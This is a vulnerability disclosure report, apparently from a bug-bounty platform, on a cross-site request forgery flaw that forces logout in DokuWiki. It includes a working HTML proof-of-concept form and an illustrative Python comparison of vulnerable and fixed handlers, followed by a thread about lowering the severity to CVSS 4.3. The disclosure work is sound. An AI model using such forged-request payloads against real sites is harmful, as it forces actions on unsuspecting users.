Cross-Site Request Forgery (CSRF) in splitbrain/dokuwiki

Status: Valid

Reported on Dec 12th 2021

Description

An attacker can log a user out of DokuWiki if that user, while logged in, visits a page the attacker controls.

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8800/doku.php">
      <input type="hidden" name="id" value="wiki&#58;welcome" />
      <input type="hidden" name="do" value="logout" />
      <input type="hidden" name="sectok" value="e4e1654b3649a6ba8e7daef724bd54a0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability allows an attacker to force users to log out without their intent.

More Detail

One way the GET request could be abused here: someone (a competitor, perhaps) places an image tag with src="<your logout link>" anywhere on the internet, and any logged-in user of your site who stumbles upon that page is logged out without knowing it. This is why logout should be a POST request protected by a CSRF token.
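To illustrate the point above, here is an added example (not DokuWiki's code and not part of the report) modelling a logout handler before and after the fix. Session, Request, the handler names and the sample requests are invented for this example; the hardened handler accepts only a POST that carries the session's own sectok.

```python
import hmac
import secrets
from dataclasses import dataclass, field

@dataclass
class Session:
    """Server-side session of a logged-in user, with its own random anti-CSRF token."""
    sectok: str = field(default_factory=lambda: secrets.token_hex(16))
    logged_in: bool = True

@dataclass
class Request:
    method: str
    params: dict
    session: Session

def logout_vulnerable(req: Request) -> bool:
    """Pre-fix behaviour: do=logout ends the session on any method, even an <img> GET."""
    if req.params.get("do") == "logout":
        req.session.logged_in = False
        return True
    return False

def logout_hardened(req: Request) -> bool:
    """Fixed behaviour: logout only on POST carrying this session's own sectok."""
    if req.method != "POST" or req.params.get("do") != "logout":
        return False
    supplied = req.params.get("sectok", "")
    # Constant-time comparison so the token cannot be guessed byte by byte via timing.
    if not hmac.compare_digest(supplied.encode(), req.session.sectok.encode()):
        return False
    req.session.logged_in = False
    return True

def run(handler, method, params, use_real_token=False) -> bool:
    s = Session()  # fresh logged-in session per attempt
    if use_real_token:  # only the wiki's own logout form can embed the real token
        params = {**params, "sectok": s.sectok}
    return handler(Request(method, params, s))

def demo() -> dict:
    img = {"do": "logout"}  # what an <img src="doku.php?do=logout"> or plain link sends
    forged = {**img, "sectok": "e4e1654b3649a6ba8e7daef724bd54a0"}  # token guessed by attacker
    return {
        "img_get_vulnerable": run(logout_vulnerable, "GET", img),
        "img_get_hardened": run(logout_hardened, "GET", img),
        "forged_post_hardened": run(logout_hardened, "POST", forged),
        "legit_post_hardened": run(logout_hardened, "POST", img, use_real_token=True),
    }
```

Only the last request succeeds against the hardened handler: the cross-site image GET and the auto-submitted form with a guessed token are both rejected.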

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the splitbrain/dokuwiki team within 24 hours. 2 months ago
We have contacted a member of the splitbrain/dokuwiki team and are waiting to hear back a month ago
Andreas Gohr validated this vulnerability a month ago
Devendra Bhatla has been awarded the disclosure bounty
The fix bounty is now up for grabs
Andreas Gohr confirmed that a fix has been merged on 6a2553 a month ago
The fix bounty has been dropped
Andreas Gohr
a month ago

Maintainer


@admin is there a way to adjust the severity? It's not really high.

KhanhCM
a month ago

Hey @dev696,

A real researcher will not just copy all the content from other reports. You should try to write your reports by yourself. What have you learned after reporting this vulnerability? Just earn the bounty or improve your skills in cybersecurity?

Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it on some reports or CVEs. DokuWiki's users will be shocked if they learn that their app has a High vulnerability whose impact is just logging a user out, with no effect on the account, just an annoyance!

Jamie Slome
a month ago

Admin


@splitbrain - absolutely, we can arrange that for you!

Can you advise on a severity score that would be more fitting for the report?

Please can you also create a CVSS vector string using the calculator here:

https://www.first.org/cvss/calculator/3.1

HDVinnie
a month ago

@admin @dev696 has definitely copy-pasted my content from my reports. This should only be a 4.3

Devendra Bhatla
a month ago

Researcher


Hi @admin Please set CVSS to 4.3

Jamie Slome
a month ago

Admin


Can you please provide the CVSS vector string to use for the new CVSS score?

Devendra Bhatla
a month ago

Researcher


@admin Please find the below CVSS Vector string.

CVSS Score = 4.3
CVSS Vector string = CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Jamie Slome
a month ago

Admin


CVSS adjusted from 7.3 to 4.3 - thanks! 🙏

Devendra Bhatla
a month ago

Researcher


Thanks for all your help, Jamie, as always!